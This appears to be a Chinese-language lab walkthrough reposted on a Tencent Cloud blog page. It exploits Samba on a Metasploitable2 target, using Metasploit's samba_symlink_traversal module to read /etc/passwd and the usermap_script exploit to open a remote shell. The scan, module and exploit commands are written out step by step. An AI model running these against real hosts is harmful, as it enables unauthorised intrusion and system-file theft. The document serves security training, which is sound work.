前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >【端口渗透】139和445的Samba后门漏洞

【端口渗透】139和445的Samba后门漏洞

作者头像
用户1467662
发布2018-03-30 12:32:14
17.4K2
发布2018-03-30 12:32:14
举报
文章被收录于专栏:农夫安全

0x00 samba后门文件读取

利用139和445Samba后门漏洞攻击Metasploitable2靶机

(1)第一步,在kali linux中启用metasploit

操作:打开kali linux的命令控制台,输入msfconsole。

实验现象截图:

(2)使用扫描工具nmap对目标靶机进行扫描

操作:msf > nmap -sS -A -Pn 192.168.1.145

实验现象截图:

由扫描结果可见,该操作系统正运行这Samba3.x服务,该服务当配置为文件权限可写同时"wide links" 被允许(默认就是允许),同样可以被作为后门而不仅仅是文件共享

(3)由扫描结果可见,该操作系统正运行这Samba3.x服务,该服务当配置为文件权限可写同时"wide links" 被允许(默认就是允许),同样可以被作为后门而不仅仅是文件共享。通过共享尝试连接靶机,只能看到被共享的文件夹

操作:smbclient –L //192.168.1.145

实验现象截图:

(4)加载Samba后门的攻击模块auxiliary/admin/smb/samba_symlink_traversal

操作:msf > use auxiliary/admin/smb/samba_symlink_traversal

实验现象截图:

(5)使用show optation查看配置选项

操作:msf auxiliary(samba_symlink_traversal) > show options

实验现象截图:

从show option输出的结果来看,还需要设置RHOST(靶机)ip地址和SMBSHARE(共享的文件夹)

(6)设置RHOSH,SMBSHARE参数

操作:msf auxiliary(samba_symlink_traversal) > set rhost 192.168.1.145

msf auxiliary(samba_symlink_traversal) > set smbshare tmp

实验现象截图:

(7)使用exploit命令初始化攻击环境,并开始对目标靶机进行攻击尝试

操作:msf auxiliary(samba_symlink_traversal) > exploit

实验现象截图:

(8)验证后门

操作:root@kali:~# smbclient //192.168.1.145/tmp

smb: \> cd rootfs\

smb: \> cd etc\

smb: \> rootfs\etc\> more passwd

实验现象截图:

0x01 Samba缓冲区溢出

利用Samba缓冲区漏洞攻击Metasploitable 乌班图靶机

(1)在kali linux中启用metasploit

操作:打开kali linux的命令控制台,输入msfconsole。

实验现象截图:

(2)使用扫描工具nmap对目标靶机进行扫描

操作:msf> nmap –sS –A --script=vuln -Pn 192.168.1.145

实验现象截图:

由扫描结果可见,该操作系统为ubuntu,正运行这Samba3.x服务和Apache 2.2.3服务。猜测可能存在samba服务远程溢出漏洞,尝试通过该端口建立一个meterpreter 会话,需要用到metasploit。

(3)加载Samba缓冲区溢出漏洞攻击模块 exploit/multi/samba/usermap_script

操作:msf > use multi/samba/usermap_script

实验现象截图:

(4)使用show optation查看配置选项

操作:msf exploit(usermap_script) > show options

实验现象截图:

从show option输出的结果来看,还需要设置RHOST(靶机)ip地址。

(5)设置RHOST参数

操作:msf exploit(usermap_script) > set rhost 192.168.1.145

实验现象截图:

(6)使用exploit命令初始化攻击环境,并开始对目标靶机进行攻击尝试

操作:msf exploit(usermap_script) > exploit

实验现象截图:

已成功建立shell会话,可通该界面对靶机进行控制

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2017-10-31,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 网络安全社区悦信安 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 利用139和445Samba后门漏洞攻击Metasploitable2靶机
  • 0x01 Samba缓冲区溢出
  • 利用Samba缓冲区漏洞攻击Metasploitable 乌班图靶机
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档